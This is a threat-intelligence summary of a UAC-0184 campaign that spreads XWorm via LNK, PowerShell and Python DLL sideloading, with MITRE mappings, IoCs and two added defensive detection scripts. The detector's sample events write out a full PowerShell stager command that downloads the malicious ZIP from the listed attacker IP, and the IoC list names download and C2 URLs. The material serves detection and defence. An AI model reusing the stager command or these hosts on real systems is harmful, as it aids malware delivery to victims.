CRIL identified a UAC-0184-linked campaign that delivers the XWorm RAT using DLL sideloading and Shadowloader, beginning with a malicious LNK that triggers PowerShell to fetch a ZIP containing Python components and an encrypted payload. The final payload attempts to reach a C2 server, though the server was inactive during analysis. #UAC-0184 #XWorm #Remcos #Shadowloader #ShadowLadder #IDATLoader #GHOSTPULSE #Ukraine
Keypoints
- CRIL found a malware campaign linked to the UAC-0184 threat actor that uses a malicious LNK to deliver the XWorm RAT via a PowerShell-downloaded ZIP containing Python components and an encrypted payload.
- UAC-0184 previously targeted Ukrainian entities in Finland and used the Remcos RAT in past operations.
- The latest activity appears focused on Ukraine, employing disguised lure documents to distribute XWorm.
- The LNK triggers a PowerShell script that downloads pkg.zip and NewCopy.xlsx, drops the files under %AppData%, and launches pythonw.exe.
- DLL sideloading and Shadowloader are used to run the final XWorm payload, which is process-hollowed into MSBuild.exe.
- XWorm attempts to contact a C2 server, but the server was inactive at the time of CRIL's analysis, so no post-infection activity was observed.
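The execution chain in the keypoints (LNK to PowerShell download, pythonw.exe out of %AppData%, MSBuild.exe spawned as the hollowing target) is what endpoint telemetry can catch even when the C2 is dead. The Python below is an added example, not code from Cyble's write-up or this summary: it runs per-process rules over constructed Sysmon-style process-creation events and then correlates them along the parent-child chain. The event shape, PIDs, paths and the command line are assumptions made for the illustration.

```python
import re
from typing import Dict, List, Optional

# Constructed Sysmon-like process-creation events (not real telemetry);
# PIDs, paths and the PowerShell command line are illustrative assumptions.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 4, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 1200, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"iwr http://88.151.192.128/"
                "djfhu34u9983234s3fnvmxxzpkg.zip -OutFile $env:APPDATA\\pkg.zip; "
                "Expand-Archive $env:APPDATA\\pkg.zip $env:APPDATA\\pkg\""},
    {"pid": 1300, "ppid": 1200,
     "image": r"C:\Users\victim\AppData\Roaming\pkg\pythonw.exe",
     "cmdline": r"pythonw.exe C:\Users\victim\AppData\Roaming\pkg\run.py"},
    {"pid": 1400, "ppid": 1300,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe"},
    # Benign noise: a Visual Studio build also spawns MSBuild.exe.
    {"pid": 2000, "ppid": 4,
     "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "cmdline": "devenv.exe"},
    {"pid": 2100, "ppid": 2000,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe proj.csproj"},
]

DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadfile|downloadstring|start-bitstransfer",
    re.I)
APPDATA_RE = re.compile(r"\\appdata\\|%appdata%|\$env:appdata", re.I)
# Parents from which MSBuild.exe has no business being started.
SCRIPT_HOSTS = {"pythonw.exe", "python.exe", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rules_for(ev: dict, parent: Optional[dict]) -> List[str]:
    """Single-event rules; each corresponds to one stage of the reported chain."""
    hits = []
    name = basename(ev["image"])
    cmd = ev["cmdline"]
    if name in ("powershell.exe", "pwsh.exe") and DOWNLOAD_RE.search(cmd) \
            and ".zip" in cmd.lower() and APPDATA_RE.search(cmd):
        hits.append("powershell_zip_download_to_appdata")
    if name == "pythonw.exe" and APPDATA_RE.search(ev["image"]):
        hits.append("pythonw_from_appdata")
    if name == "msbuild.exe" and parent is not None \
            and basename(parent["image"]) in SCRIPT_HOSTS:
        hits.append("msbuild_spawned_by_script_host")
    return hits


def detect(events: List[dict]) -> Dict[int, List[str]]:
    """Return {pid: [rule names]} for every event that fires a rule. An MSBuild
    hit additionally gets 'xworm_style_chain' when its ancestry contains both
    the pythonw-from-AppData and the PowerShell-download stages."""
    by_pid = {ev["pid"]: ev for ev in events}
    results: Dict[int, List[str]] = {}
    for ev in events:
        hits = rules_for(ev, by_pid.get(ev["ppid"]))
        if hits:
            results[ev["pid"]] = hits
    for pid, hits in list(results.items()):
        if "msbuild_spawned_by_script_host" not in hits:
            continue
        seen = set()
        cur = by_pid.get(by_pid[pid]["ppid"])
        while cur is not None:  # walk up the parent chain
            seen.update(results.get(cur["pid"], []))
            cur = by_pid.get(cur["ppid"])
        if {"pythonw_from_appdata", "powershell_zip_download_to_appdata"} <= seen:
            hits.append("xworm_style_chain")
    return results


if __name__ == "__main__":
    for pid, hits in detect(SAMPLE_EVENTS).items():
        print(pid, hits)
```

The per-process rules are noisy on their own (developers run pythonw.exe from user profiles; PowerShell legitimately downloads ZIPs), which is why the correlated chain hit, not any single rule, is the one worth paging on; the Visual Studio build in the sample events fires nothing.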
MITRE Techniques
- [T1064] Scripting – ‘Executes visual basic scripts’; consistent with the vmtcuv.vbs listed under Indicators of Compromise. (T1064 is deprecated in ATT&CK; the current mapping is T1059.005, Visual Basic.)
- [T1059.001] PowerShell – ‘Powershell downloads PE & ZIP files’; the LNK-triggered script that fetches pkg.zip and NewCopy.xlsx.
- [T1547.001] Registry Run Keys / Startup Folder – ‘Creates a start menu entry (Start Menu\Programs\Startup)’ for persistence.
- [T1574.002] DLL Side-Loading – ‘Adversaries may execute their own malicious payloads by side-loading DLLs.’; VCL120.dll is the side-loaded DLL named under Indicators of Compromise.
- [T1055] Process Injection – ‘Injects malicious content into MSBuild.exe process.’; the final XWorm payload is process-hollowed into MSBuild.exe.
- [T1027] Obfuscated/Compressed Files or Information – ‘Net Binary include packed or crypted data.’
- [T1140] Deobfuscate/Decode Files or Information – ‘Deobfuscate/Decode Files or Information’; the encrypted payload carried in the ZIP is decoded before execution.
- [T1057] Process Discovery – ‘Queries a list of all running processes.’
- [T1518.001] Security Software Discovery – ‘May try to detect the virtual machine to hinder analysis’ (VM detection itself is more precisely T1497.001, Virtualization/Sandbox Evasion: System Checks).
- [T1071] Application Layer Protocol – ‘Malware exe communicate to C&C server.’; the HTTP beacon to the C2 URL listed under Indicators of Compromise.
- [T1105] Ingress Tool Transfer – ‘Downloads files from webservers via HTTP’; pkg.zip is fetched from the listed download URLs.
Indicators of Compromise
- [Sha256] NewCopy.xlsx.lnk: bf5a2450f5287f775c2427590c29c27e28e3662c2f68296c64cdacdb639f3b97; Pkg.zip: 38dea3732044129bd99314de582ba3d58a649c8967fe12b98cd867ca6e349ffe
- [URL] Malicious download URLs: hxxp://88.151.192[.]128/djfhu34u9983234s3fnvmxxzpkg.zip, hxxp://81.19.139[.]62/f8d79yuhjhlgdjlsjkf83da0pkg.zip
- [IP Address] Download hosts: 88.151.192[.]128, 81.19.139[.]62; C2: 185.216.68[.]142
- [Filename] XWorm, sud.exe, vcl120.bpl, vmtcuv.vbs
- [LNK] NewCopy.xlsx.lnk, Відомості про кредитора.dvs. (Ukrainian: "Information about the creditor"; LNK shortcut files)
- [C2] hxxp://185.216.68[.]142:9000/hooks/xxx?id=%computername% (the beacon carries the victim hostname in the id parameter)
- [ZIP] Pkg.zip (archive with the Python components and the encrypted payload); NewCopy.xlsx (downloaded alongside it as the lure document)
- [DLL] VCL120.dll (via DLL side-loading)
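The indicators above are defanged, and the C2 URL is a template with a %computername% placeholder rather than a literal string, so neither can be grepped for as-is. The Python below is an added example, not code from Cyble's write-up or this summary: it refangs the listed indicators, turns the beacon template into a pattern that matches any hostname value, and runs both over constructed proxy log lines, plus a lookup of the two listed SHA256 hashes. The log format and the log lines are assumptions for the illustration.

```python
import re
from typing import Dict, List

# Indicators as listed in this summary (kept defanged; refang() restores them).
DEFANGED_URLS = [
    "hxxp://88.151.192[.]128/djfhu34u9983234s3fnvmxxzpkg.zip",
    "hxxp://81.19.139[.]62/f8d79yuhjhlgdjlsjkf83da0pkg.zip",
]
C2_TEMPLATE = "hxxp://185.216.68[.]142:9000/hooks/xxx?id=%computername%"
SHA256S = {
    "bf5a2450f5287f775c2427590c29c27e28e3662c2f68296c64cdacdb639f3b97": "NewCopy.xlsx.lnk",
    "38dea3732044129bd99314de582ba3d58a649c8967fe12b98cd867ca6e349ffe": "Pkg.zip",
}

# Constructed proxy log lines (not real traffic): "<ts> <client> <method> <url> <status>".
SAMPLE_PROXY_LOG = [
    "2024-06-01T09:00:01Z 10.0.0.15 GET http://88.151.192.128/djfhu34u9983234s3fnvmxxzpkg.zip 200",
    "2024-06-01T09:00:02Z 10.0.0.15 GET http://example.org/index.html 200",
    "2024-06-01T09:00:05Z 10.0.0.15 GET http://185.216.68.142:9000/hooks/xxx?id=DESKTOP-ABC123 000",
    "2024-06-01T09:00:09Z 10.0.0.22 GET http://185.216.68.142:9000/other 404",
]


def refang(ioc: str) -> str:
    """Undo common defanging: hxxp(s) -> http(s), [.] -> ., [:] -> :."""
    out = re.sub(r"(?i)^hxxp", "http", ioc)
    return out.replace("[.]", ".").replace("[:]", ":")


def c2_regex(template: str) -> "re.Pattern[str]":
    """Turn the defanged beacon template into an anchored regex in which the
    %computername% placeholder matches any single query-parameter value."""
    parts = refang(template).split("%computername%")
    return re.compile("^" + r"[^\s&]+".join(re.escape(p) for p in parts) + "$")


def scan_proxy_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one hit per log line whose URL is a listed download URL or
    matches the C2 beacon template; beacon hits also carry the reported id."""
    exact = {refang(u) for u in DEFANGED_URLS}
    beacon = c2_regex(C2_TEMPLATE)
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line; skip rather than crash the sweep
        url = fields[3]
        if url in exact:
            hits.append({"line": line, "kind": "stager_download", "url": url})
        elif beacon.match(url):
            hits.append({"line": line, "kind": "c2_beacon", "url": url,
                         "host_id": url.split("id=", 1)[1]})
    return hits


def match_hashes(observed: Dict[str, str]) -> Dict[str, str]:
    """observed maps file path -> SHA256 (any case); returns path -> IoC label
    for every file whose hash is in the list above."""
    return {path: SHA256S[h.lower()] for path, h in observed.items()
            if h.lower() in SHA256S}


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(hit["kind"], hit["url"])
```

Note that the beacon line in the sample log has status 000, the kind of entry a proxy writes when the upstream never answers; since the C2 was inactive during CRIL's analysis, a failed connection attempt to that URL is exactly the artefact to look for, and the id value recovered from it names the beaconing host.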
Read more: https://cyble.com/blog/uac-0184-abuses-python-in-dll-sideloading-for-xworm-distribution/